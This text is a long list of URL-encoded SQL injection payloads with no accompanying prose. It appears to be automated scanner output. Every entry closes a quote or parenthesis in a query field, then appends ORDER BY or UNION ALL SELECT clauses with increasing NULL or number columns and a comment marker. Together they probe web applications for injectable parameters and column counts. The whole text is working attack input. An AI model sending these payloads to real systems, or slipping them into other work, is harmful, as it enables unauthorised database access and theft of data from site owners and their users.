foo%20WHERE%204852%3D4852%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%20WHERE%204620%3D4620%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%20WHERE%206045%3D6045%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%20WHERE%205132%3D5132%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%20WHERE%203227%3D3227%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%27%7C%7C%28SELECT%20%27igij%27%20FROM%20DUAL%20WHERE%206749%3D6749%20ORDER%20BY%201%23 foo%27%7C%7C%28SELECT%20%27qppC%27%20FROM%20DUAL%20WHERE%207218%3D7218%20ORDER%20BY%207891%23 foo%27%7C%7C%28SELECT%20%27ooDG%27%20FROM%20DUAL%20WHERE%206645%3D6645%20UNION%20ALL%20SELECT%20NULL%23 foo%27%7C%7C%28SELECT%20%27AeZs%27%20FROM%20DUAL%20WHERE%202932%3D2932%20UNION%20ALL%20SELECT%20NULL%2CNULL%23 foo%27%7C%7C%28SELECT%20%27ztJF%27%20FROM%20DUAL%20WHERE%203868%3D3868%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%23 foo%27%7C%7C%28SELECT%20%27gFQF%27%20FROM%20DUAL%20WHERE%201728%3D1728%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%23 foo%27%7C%7C%28SELECT%20%27WVzz%27%20FROM%20DUAL%20WHERE%207999%3D7999%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%27%7C%7C%28SELECT%20%27koVG%27%20FROM%20DUAL%20WHERE%206130%3D6130%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%27%7C%7C%28SELECT%20%27otUV%27%20FROM%20DUAL%20WHERE%204155%3D4155%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%27%7C%7C%28SELECT%20%27CBjx%27%20FROM%20DUAL%20WHERE%207333%3D7333%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%27%7C%7C%28SELECT%20%27FbkZ%27%20FROM%20DUAL%20WHERE%208467%3D8467%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%27%7C%7C%28SELECT%20%27rJNX%27%20FROM%20DUAL%20WHERE%203720%3D3720%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%27%7C%7C%28SELECT%20%27gloU%27%20WHERE%204768%3D4768%20ORDER%20BY%201%23 foo%27%7C%7C%28SELECT%20%27DfNs%27%20WHERE%207287%3D7287%20ORDER%20BY%206385%23 foo%27%7C%7C%28SELECT%20%27MsNF%27%20WHERE%201912%3D1912%20UNION%20ALL%20SELECT%20NULL%23 foo%27%7C%7C%28SELECT%20%27RSRL%27%20WHERE%207846%3D7846%20UNION%20ALL%20SELECT%20NULL%2CNULL%23 foo%27%7C%7C%28SELECT%20%27kqvM%27%20WHERE%203223%3D3223%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%23 foo%27%7C%7C%28SELECT%20%27FhBL%27%20WHERE%208777%3D8777%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%23 foo%27%7C%7C%28SELECT%20%27oIvj%27%20WHERE%204085%3D4085%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%27%7C%7C%28SELECT%20%27eNRW%27%20WHERE%201645%3D1645%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%27%7C%7C%28SELECT%20%27tOrA%27%20WHERE%203308%3D3308%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%27%7C%7C%28SELECT%20%27OOtO%27%20WHERE%204342%3D4342%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%27%7C%7C%28SELECT%20%27kFqS%27%20WHERE%208694%3D8694%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%27%7C%7C%28SELECT%20%27iGFP%27%20WHERE%208536%3D8536%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%27%2B%28SELECT%20trsv%20WHERE%202659%3D2659%20ORDER%20BY%201%23 foo%27%2B%28SELECT%20mSYi%20WHERE%201969%3D1969%20ORDER%20BY%205313%23 foo%27%2B%28SELECT%20Unuc%20WHERE%202702%3D2702%20UNION%20ALL%20SELECT%20NULL%23 foo%27%2B%28SELECT%20stdQ%20WHERE%203892%3D3892%20UNION%20ALL%20SELECT%20NULL%2CNULL%23 foo%27%2B%28SELECT%20ODWH%20WHERE%204597%3D4597%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%23 foo%27%2B%28SELECT%20bIzf%20WHERE%206495%3D6495%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%23 foo%27%2B%28SELECT%20GpEu%20WHERE%203288%3D3288%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%27%2B%28SELECT%20fTid%20WHERE%208605%3D8605%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%27%2B%28SELECT%20WAau%20WHERE%202964%3D2964%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%27%2B%28SELECT%20opzC%20WHERE%203750%3D3750%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%27%2B%28SELECT%20FtQp%20WHERE%203640%3D3640%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%27%2B%28SELECT%20jHRw%20WHERE%204628%3D4628%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%27%2B%28SELECT%20%27CxkI%27%20WHERE%202911%3D2911%20ORDER%20BY%201%23 foo%27%2B%28SELECT%20%27Pwzu%27%20WHERE%201071%3D1071%20ORDER%20BY%206903%23 foo%27%2B%28SELECT%20%27ACKQ%27%20WHERE%208979%3D8979%20UNION%20ALL%20SELECT%20NULL%23 foo%27%2B%28SELECT%20%27nrrJ%27%20WHERE%203782%3D3782%20UNION%20ALL%20SELECT%20NULL%2CNULL%23 foo%27%2B%28SELECT%20%27JuqG%27%20WHERE%201377%3D1377%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%23 foo%27%2B%28SELECT%20%27ecpo%27%20WHERE%202399%3D2399%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%23 foo%27%2B%28SELECT%20%27ymEo%27%20WHERE%203647%3D3647%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%27%2B%28SELECT%20%27djfa%27%20WHERE%201047%3D1047%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%27%2B%28SELECT%20%27Pomr%27%20WHERE%209711%3D9711%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%27%2B%28SELECT%20%27bKql%27%20WHERE%204796%3D4796%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%27%2B%28SELECT%20%27mneP%27%20WHERE%208684%3D8684%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%27%2B%28SELECT%20%27TTyu%27%20WHERE%208890%3D8890%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%27%20IN%20BOOLEAN%20MODE%29%20ORDER%20BY%201%23 foo%27%20IN%20BOOLEAN%20MODE%29%20ORDER%20BY%208970%23 foo%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%20NULL%23 foo%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%23 foo%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%23 foo%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%23 foo%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 -3251%29%20ORDER%20BY%201%23 -5855%29%20ORDER%20BY%203657%23 -5580%29%20UNION%20ALL%20SELECT%204900%23 -8937%29%20UNION%20ALL%20SELECT%205406%2C5406%23 -9524%29%20UNION%20ALL%20SELECT%205079%2C5079%2C5079%23 -8429%29%20UNION%20ALL%20SELECT%207326%2C7326%2C7326%2C7326%23 -1580%29%20UNION%20ALL%20SELECT%208047%2C8047%2C8047%2C8047%2C8047%23 -4060%29%20UNION%20ALL%20SELECT%209927%2C9927%2C9927%2C9927%2C9927%2C9927%23 -3863%29%20UNION%20ALL%20SELECT%201670%2C1670%2C1670%2C1670%2C1670%2C1670%2C1670%23 -6617%29%20UNION%20ALL%20SELECT%204137%2C4137%2C4137%2C4137%2C4137%2C4137%2C4137%2C4137%23 -1083%29%20UNION%20ALL%20SELECT%204933%2C4933%2C4933%2C4933%2C4933%2C4933%2C4933%2C4933%2C4933%23 -4042%29%20UNION%20ALL%20SELECT%209477%2C9477%2C9477%2C9477%2C9477%2C9477%2C9477%2C9477%2C9477%2C9477%23 -9624%27%29%20ORDER%20BY%201%23 -6216%27%29%20ORDER%20BY%205785%23 -3027%27%29%20UNION%20ALL%20SELECT%202724%23 -5575%27%29%20UNION%20ALL%20SELECT%205040%2C5040%23 -8529%27%29%20UNION%20ALL%20SELECT%206293%2C6293%2C6293%23 -8257%27%29%20UNION%20ALL%20SELECT%202697%2C2697%2C2697%2C2697%23 -1192%27%29%20UNION%20ALL%20SELECT%208126%2C8126%2C8126%2C8126%2C8126%23 -5075%27%29%20UNION%20ALL%20SELECT%203984%2C3984%2C3984%2C3984%2C3984%2C3984%23 -2281%27%29%20UNION%20ALL%20SELECT%202871%2C2871%2C2871%2C2871%2C2871%2C2871%2C2871%23 -2035%27%29%20UNION%20ALL%20SELECT%206033%2C6033%2C6033%2C6033%2C6033%2C6033%2C6033%2C6033%23 -7513%27%29%20UNION%20ALL%20SELECT%209239%2C9239%2C9239%2C9239%2C9239%2C9239%2C9239%2C9239%2C9239%23 -8975%27%29%20UNION%20ALL%20SELECT%209999%2C9999%2C9999%2C9999%2C9999%2C9999%2C9999%2C9999%2C9999%2C9999%23 -3102%27%20ORDER%20BY%201%23 -4403%27%20ORDER%20BY%206958%23 -8276%27%20UNION%20ALL%20SELECT%204951%23 -4946%27%20UNION%20ALL%20SELECT%202444%2C2444%23 -1486%27%20UNION%20ALL%20SELECT%203676%2C3676%2C3676%23 -4646%27%20UNION%20ALL%20SELECT%203060%2C3060%2C3060%2C3060%23 -8823%27%20UNION%20ALL%20SELECT%202702%2C2702%2C2702%2C2702%2C2702%23 -4925%27%20UNION%20ALL%20SELECT%208945%2C8945%2C8945%2C8945%2C8945%2C8945%23 -4895%27%20UNION%20ALL%20SELECT%201003%2C1003%2C1003%2C1003%2C1003%2C1003%2C1003%23 -2163%27%20UNION%20ALL%20SELECT%207022%2C7022%2C7022%2C7022%2C7022%2C7022%2C7022%2C7022%23 -8509%27%20UNION%20ALL%20SELECT%208724%2C8724%2C8724%2C8724%2C8724%2C8724%2C8724%2C8724%2C8724%23 -8029%27%20UNION%20ALL%20SELECT%201797%2C1797%2C1797%2C1797%2C1797%2C1797%2C1797%2C1797%2C1797%2C1797%23 -9428%22%20ORDER%20BY%201%23 -8027%22%20ORDER%20BY%208767%23 -8369%22%20UNION%20ALL%20SELECT%203083%23 -9973%22%20UNION%20ALL%20SELECT%208475%2C8475%23 -6987%22%20UNION%20ALL%20SELECT%208688%2C8688%2C8688%23 -6216%22%20UNION%20ALL%20SELECT%205663%2C5663%2C5663%2C5663%23 -4865%22%20UNION%20ALL%20SELECT%204004%2C4004%2C4004%2C4004%2C4004%23 -4762%22%20UNION%20ALL%20SELECT%203899%2C3899%2C3899%2C3899%2C3899%2C3899%23 -9783%22%20UNION%20ALL%20SELECT%207130%2C7130%2C7130%2C7130%2C7130%2C7130%2C7130%23 -7304%22%20UNION%20ALL%20SELECT%201461%2C1461%2C1461%2C1461%2C1461%2C1461%2C1461%2C1461%23 -1089%22%20UNION%20ALL%20SELECT%204784%2C4784%2C4784%2C4784%2C4784%2C4784%2C4784%2C4784%2C4784%23 -4397%22%20UNION%20ALL%20SELECT%204851%2C4851%2C4851%2C4851%2C4851%2C4851%2C4851%2C4851%2C4851%2C4851%23 -9800%29%20ORDER%20BY%201%23 -5132%29%20ORDER%20BY%203642%23 -9794%29%20UNION%20ALL%20SELECT%207719%23 -3176%29%20UNION%20ALL%20SELECT%207417%2C7417%23 -6456%29%20UNION%20ALL%20SELECT%201550%2C1550%2C1550%23 -8003%29%20UNION%20ALL%20SELECT%201668%2C1668%2C1668%2C1668%23 -4637%29%20UNION%20ALL%20SELECT%209199%2C9199%2C9199%2C9199%2C9199%23 -9424%29%20UNION%20ALL%20SELECT%207130%2C7130%2C7130%2C7130%2C7130%2C7130%23 -8351%29%20UNION%20ALL%20SELECT%208971%2C8971%2C8971%2C8971%2C8971%2C8971%2C8971%23 -5374%29%20UNION%20ALL%20SELECT%208864%2C8864%2C8864%2C8864%2C8864%2C8864%2C8864%2C8864%23 -6530%29%20UNION%20ALL%20SELECT%202230%2C2230%2C2230%2C2230%2C2230%2C2230%2C2230%2C2230%2C2230%23 -6088%29%20UNION%20ALL%20SELECT%206527%2C6527%2C6527%2C6527%2C6527%2C6527%2C6527%2C6527%2C6527%2C6527%23 -6114%29%29%20ORDER%20BY%201%23 -3761%29%29%20ORDER%20BY%208727%23 -9493%29%29%20UNION%20ALL%20SELECT%208954%23 -9180%29%29%20UNION%20ALL%20SELECT%201979%2C1979%23 -2558%29%29%20UNION%20ALL%20SELECT%209585%2C9585%2C9585%23 -3310%29%29%20UNION%20ALL%20SELECT%208504%2C8504%2C8504%2C8504%23 -7550%29%29%20UNION%20ALL%20SELECT%205733%2C5733%2C5733%2C5733%2C5733%23 -9414%29%29%20UNION%20ALL%20SELECT%209318%2C9318%2C9318%2C9318%2C9318%2C9318%23 -1472%29%29%20UNION%20ALL%20SELECT%202295%2C2295%2C2295%2C2295%2C2295%2C2295%2C2295%23 -4365%29%29%20UNION%20ALL%20SELECT%202005%2C2005%2C2005%2C2005%2C2005%2C2005%2C2005%2C2005%23 -4710%29%29%20UNION%20ALL%20SELECT%205719%2C5719%2C5719%2C5719%2C5719%2C5719%2C5719%2C5719%2C5719%23 -2402%29%29%20UNION%20ALL%20SELECT%202471%2C2471%2C2471%2C2471%2C2471%2C2471%2C2471%2C2471%2C2471%2C2471%23 -3546%29%29%29%20ORDER%20BY%201%23 -8055%29%29%29%20ORDER%20BY%207959%23 -3297%29%29%29%20UNION%20ALL%20SELECT%207065%23 -5068%29%29%29%20UNION%20ALL%20SELECT%208262%2C8262%23 -9294%29%29%29%20UNION%20ALL%20SELECT%202599%2C2599%2C2599%23 -7060%29%29%29%20UNION%20ALL%20SELECT%209330%2C9330%2C9330%2C9330%23 -4989%29%29%29%20UNION%20ALL%20SELECT%204218%2C4218%2C4218%2C4218%2C4218%23 -2417%29%29%29%20UNION%20ALL%20SELECT%204692%2C4692%2C4692%2C4692%2C4692%2C4692%23 -9253%29%29%29%20UNION%20ALL%20SELECT%202742%2C2742%2C2742%2C2742%2C2742%2C2742%2C2742%23 -9487%29%29%29%20UNION%20ALL%20SELECT%208661%2C8661%2C8661%2C8661%2C8661%2C8661%2C8661%2C8661%23 -8523%29%29%29%20UNION%20ALL%20SELECT%208125%2C8125%2C8125%2C8125%2C8125%2C8125%2C8125%2C8125%2C8125%23 -1224%29%29%29%20UNION%20ALL%20SELECT%207548%2C7548%2C7548%2C7548%2C7548%2C7548%2C7548%2C7548%2C7548%2C7548%23 -3516%20ORDER%20BY%201%23 -1657%20ORDER%20BY%202350%23 -3751%20UNION%20ALL%20SELECT%203086%23 -2757%20UNION%20ALL%20SELECT%201085%2C1085%23 -7640%20UNION%20ALL%20SELECT%209676%2C9676%2C9676%23 -1551%20UNION%20ALL%20SELECT%206254%2C6254%2C6254%2C6254%23 -7083%20UNION%20ALL%20SELECT%209267%2C9267%2C9267%2C9267%2C9267%23 -7782%20UNION%20ALL%20SELECT%208756%2C8756%2C8756%2C8756%2C8756%2C8756%23 -8323%20UNION%20ALL%20SELECT%201679%2C1679%2C1679%2C1679%2C1679%2C1679%2C1679%23 -7646%20UNION%20ALL%20SELECT%204418%2C4418%2C4418%2C4418%2C4418%2C4418%2C4418%2C4418%23 -7320%20UNION%20ALL%20SELECT%201281%2C1281%2C1281%2C1281%2C1281%2C1281%2C1281%2C1281%2C1281%23 -7642%20UNION%20ALL%20SELECT%203538%2C3538%2C3538%2C3538%2C3538%2C3538%2C3538%2C3538%2C3538%2C3538%23 -4464%27%29%20ORDER%20BY%201%23 -2327%27%29%20ORDER%20BY%204516%23 -9154%27%29%20UNION%20ALL%20SELECT%207132%23 -2665%27%29%20UNION%20ALL%20SELECT%204661%2C4661%23 -8333%27%29%20UNION%20ALL%20SELECT%203938%2C3938%2C3938%23 -9425%27%29%20UNION%20ALL%20SELECT%207563%2C7563%2C7563%2C7563%23 -3982%27%29%20UNION%20ALL%20SELECT%209900%2C9900%2C9900%2C9900%2C9900%23 -6841%27%29%20UNION%20ALL%20SELECT%206802%2C6802%2C6802%2C6802%2C6802%2C6802%23 -6316%27%29%20UNION%20ALL%20SELECT%209186%2C9186%2C9186%2C9186%2C9186%2C9186%2C9186%23 -7367%27%29%20UNION%20ALL%20SELECT%209635%2C9635%2C9635%2C9635%2C9635%2C9635%2C9635%2C9635%23 -5452%27%29%20UNION%20ALL%20SELECT%208823%2C8823%2C8823%2C8823%2C8823%2C8823%2C8823%2C8823%2C8823%23 -4498%27%29%20UNION%20ALL%20SELECT%209390%2C9390%2C9390%2C9390%2C9390%2C9390%2C9390%2C9390%2C9390%2C9390%23 -1064%27%29%29%20ORDER%20BY%201%23 -5843%27%29%29%20ORDER%20BY%205427%23 -5022%27%29%29%20UNION%20ALL%20SELECT%203645%23 -2700%27%29%29%20UNION%20ALL%20SELECT%208623%2C8623%23 -5804%27%29%29%20UNION%20ALL%20SELECT%205298%2C5298%2C5298%23 -9969%27%29%29%20UNION%20ALL%20SELECT%208982%2C8982%2C8982%2C8982%23 -3374%27%29%29%20UNION%20ALL%20SELECT%201214%2C1214%2C1214%2C1214%2C1214%23 -2588%27%29%29%20UNION%20ALL%20SELECT%209397%2C9397%2C9397%2C9397%2C9397%2C9397%23 -9721%27%29%29%20UNION%20ALL%20SELECT%205443%2C5443%2C5443%2C5443%2C5443%2C5443%2C5443%23 -8482%27%29%29%20UNION%20ALL%20SELECT%209665%2C9665%2C9665%2C9665%2C9665%2C9665%2C9665%2C9665%23 -4769%27%29%29%20UNION%20ALL%20SELECT%209266%2C9266%2C9266%2C9266%2C9266%2C9266%2C9266%2C9266%2C9266%23 -6838%27%29%29%20UNION%20ALL%20SELECT%201139%2C1139%2C1139%2C1139%2C1139%2C1139%2C1139%2C1139%2C1139%2C1139%23 -7476%27%29%29%29%20ORDER%20BY%201%23 -1312%27%29%29%29%20ORDER%20BY%206137%23 -5508%27%29%29%29%20UNION%20ALL%20SELECT%203148%23 -9113%27%29%29%29%20UNION%20ALL%20SELECT%205667%2C5667%23 -5988%27%29%29%29%20UNION%20ALL%20SELECT%203740%2C3740%2C3740%23 -5501%27%29%29%29%20UNION%20ALL%20SELECT%203325%2C3325%2C3325%2C3325%23 -1109%27%29%29%29%20UNION%20ALL%20SELECT%202996%2C2996%2C2996%2C2996%2C2996%23 -9641%27%29%29%29%20UNION%20ALL%20SELECT%203274%2C3274%2C3274%2C3274%2C3274%2C3274%23 -2877%27%29%29%29%20UNION%20ALL%20SELECT%202636%2C2636%2C2636%2C2636%2C2636%2C2636%2C2636%23 -9498%27%29%29%29%20UNION%20ALL%20SELECT%208692%2C8692%2C8692%2C8692%2C8692%2C8692%2C8692%2C8692%23 -4115%27%29%29%29%20UNION%20ALL%20SELECT%203319%2C3319%2C3319%2C3319%2C3319%2C3319%2C3319%2C3319%2C3319%23 -1504%27%29%29%29%20UNION%20ALL%20SELECT%207444%2C7444%2C7444%2C7444%2C7444%2C7444%2C7444%2C7444%2C7444%2C7444%23 -6935%27%20ORDER%20BY%201%23 -6117%27%20ORDER%20BY%201040%23 -9443%27%20UNION%20ALL%20SELECT%207308%23 -1193%27%20UNION%20ALL%20SELECT%204675%2C4675%23 -7416%27%20UNION%20ALL%20SELECT%204865%2C4865%2C4865%23 -4619%27%20UNION%20ALL%20SELECT%209966%2C9966%2C9966%2C9966%23 -5668%27%20UNION%20ALL%20SELECT%209571%2C9571%2C9571%2C9571%2C9571%23 -7816%27%20UNION%20ALL%20SELECT%204229%2C4229%2C4229%2C4229%2C4229%2C4229%23 -8893%27%20UNION%20ALL%20SELECT%201376%2C1376%2C1376%2C1376%2C1376%2C1376%2C1376%23 -5438%27%20UNION%20ALL%20SELECT%203068%2C3068%2C3068%2C3068%2C3068%2C3068%2C3068%2C3068%23 -4928%27%20UNION%20ALL%20SELECT%203368%2C3368%2C3368%2C3368%2C3368%2C3368%2C3368%2C3368%2C3368%23 -2678%27%20UNION%20ALL%20SELECT%201756%2C1756%2C1756%2C1756%2C1756%2C1756%2C1756%2C1756%2C1756%2C1756%23 -5797%27%29%20ORDER%20BY%201%23 -8866%27%29%20ORDER%20BY%204910%23 -9656%27%29%20UNION%20ALL%20SELECT%202637%23 -3106%27%29%20UNION%20ALL%20SELECT%206439%2C6439%23 -5105%27%29%20UNION%20ALL%20SELECT%204324%2C4324%2C4324%23 -7854%27%29%20UNION%20ALL%20SELECT%203849%2C3849%2C3849%2C3849%23 -5486%27%29%20UNION%20ALL%20SELECT%204665%2C4665%2C4665%2C4665%2C4665%23 -8491%27%29%20UNION%20ALL%20SELECT%203097%2C3097%2C3097%2C3097%2C3097%2C3097%23 -9230%27%29%20UNION%20ALL%20SELECT%209376%2C9376%2C9376%2C9376%2C9376%2C9376%2C9376%23 -1584%27%29%20UNION%20ALL%20SELECT%203562%2C3562%2C3562%2C3562%2C3562%2C3562%2C3562%2C3562%23 -7238%27%29%20UNION%20ALL%20SELECT%208649%2C8649%2C8649%2C8649%2C8649%2C8649%2C8649%2C8649%2C8649%23 -3182%27%29%20UNION%20ALL%20SELECT%207333%2C7333%2C7333%2C7333%2C7333%2C7333%2C7333%2C7333%2C7333%2C7333%23 -3199%27%29%29%20ORDER%20BY%201%23 -4819%27%29%29%20ORDER%20BY%204867%23 -8993%27%29%29%20UNION%20ALL%20SELECT%206163%23 -3382%27%29%29%20UNION%20ALL%20SELECT%205823%2C5823%23 -5943%27%29%29%20UNION%20ALL%20SELECT%205320%2C5320%2C5320%23 -4241%27%29%29%20UNION%20ALL%20SELECT%206404%2C6404%2C6404%2C6404%23 -9750%27%29%29%20UNION%20ALL%20SELECT%202271%2C2271%2C2271%2C2271%2C2271%23 -6188%27%29%29%20UNION%20ALL%20SELECT%202328%2C2328%2C2328%2C2328%2C2328%2C2328%23 -7802%27%29%29%20UNION%20ALL%20SELECT%201912%2C1912%2C1912%2C1912%2C1912%2C1912%2C1912%23 -3207%27%29%29%20UNION%20ALL%20SELECT%202250%2C2250%2C2250%2C2250%2C2250%2C2250%2C2250%2C2250%23 -1211%27%29%29%20UNION%20ALL%20SELECT%205422%2C5422%2C5422%2C5422%2C5422%2C5422%2C5422%2C5422%2C5422%23 -8178%27%29%29%20UNION%20ALL%20SELECT%202836%2C2836%2C2836%2C2836%2C2836%2C2836%2C2836%2C2836%2C2836%2C2836%23 -3939%27%29%29%29%20ORDER%20BY%201%23 -9739%27%29%29%29%20ORDER%20BY%208279%23 -9846%27%29%29%29%20UNION%20ALL%20SELECT%205704%23 -5896%27%29%29%29%20UNION%20ALL%20SELECT%203733%2C3733%23 -3601%27%29%29%29%20UNION%20ALL%20SELECT%204640%2C4640%2C4640%23 -6747%27%29%29%29%20UNION%20ALL%20SELECT%209418%2C9418%2C9418%2C9418%23 -3902%27%29%29%29%20UNION%20ALL%20SELECT%203341%2C3341%2C3341%2C3341%2C3341%23 -5974%27%29%29%29%20UNION%20ALL%20SELECT%202699%2C2699%2C2699%2C2699%2C2699%2C2699%23 -2389%27%29%29%29%20UNION%20ALL%20SELECT%208208%2C8208%2C8208%2C8208%2C8208%2C8208%2C8208%23 -4638%27%29%29%29%20UNION%20ALL%20SELECT%201228%2C1228%2C1228%2C1228%2C1228%2C1228%2C1228%2C1228%23 -6217%27%29%29%29%20UNION%20ALL%20SELECT%203618%2C3618%2C3618%2C3618%2C3618%2C3618%2C3618%2C3618%2C3618%23 -1039%27%29%29%29%20UNION%20ALL%20SELECT%209864%2C9864%2C9864%2C9864%2C9864%2C9864%2C9864%2C9864%2C9864%2C9864%23 -4326%27%20ORDER%20BY%201%23 -7745%27%20ORDER%20BY%203379%23 -4349%27%20UNION%20ALL%20SELECT%204853%23 -3466%27%20UNION%20ALL%20SELECT%201010%2C1010%23 -6250%27%20UNION%20ALL%20SELECT%205243%2C5243%2C5243%23 -6731%27%20UNION%20ALL%20SELECT%202239%2C2239%2C2239%2C2239%23 -1113%27%20UNION%20ALL%20SELECT%204471%2C4471%2C4471%2C4471%2C4471%23 -3156%27%20UNION%20ALL%20SELECT%206312%2C6312%2C6312%2C6312%2C6312%2C6312%23 -1013%27%20UNION%20ALL%20SELECT%203829%2C3829%2C3829%2C3829%2C3829%2C3829%2C3829%23 -1528%27%20UNION%20ALL%20SELECT%205907%2C5907%2C5907%2C5907%2C5907%2C5907%2C5907%2C5907%23 -1971%27%20UNION%20ALL%20SELECT%202171%2C2171%2C2171%2C2171%2C2171%2C2171%2C2171%2C2171%2C2171%23 -5168%27%20UNION%20ALL%20SELECT%202924%2C2924%2C2924%2C2924%2C2924%2C2924%2C2924%2C2924%2C2924%2C2924%23 -8837%22%29%20ORDER%20BY%201%23 -5763%22%29%20ORDER%20BY%208559%23 -8384%22%29%20UNION%20ALL%20SELECT%203536%23 -9494%22%29%20UNION%20ALL%20SELECT%208445%2C8445%23 -3305%22%29%20UNION%20ALL%20SELECT%204580%2C4580%2C4580%23 -4682%22%29%20UNION%20ALL%20SELECT%207290%2C7290%2C7290%2C7290%23 -8114%22%29%20UNION%20ALL%20SELECT%205960%2C5960%2C5960%2C5960%2C5960%23 -7427%22%29%20UNION%20ALL%20SELECT%205895%2C5895%2C5895%2C5895%2C5895%2C5895%23 -6568%22%29%20UNION%20ALL%20SELECT%204855%2C4855%2C4855%2C4855%2C4855%2C4855%2C4855%23 -1203%22%29%20UNION%20ALL%20SELECT%205891%2C5891%2C5891%2C5891%2C5891%2C5891%2C5891%2C5891%23 -4316%22%29%20UNION%20ALL%20SELECT%205255%2C5255%2C5255%2C5255%2C5255%2C5255%2C5255%2C5255%2C5255%23 -6633%22%29%20UNION%20ALL%20SELECT%203067%2C3067%2C3067%2C3067%2C3067%2C3067%2C3067%2C3067%2C3067%2C3067%23 -9124%22%29%29%20ORDER%20BY%201%23 -9731%22%29%29%20ORDER%20BY%206876%23 -9145%22%29%29%20UNION%20ALL%20SELECT%206973%23 -5166%22%29%29%20UNION%20ALL%20SELECT%206297%2C6297%23 -1702%22%29%29%20UNION%20ALL%20SELECT%208145%2C8145%2C8145%23 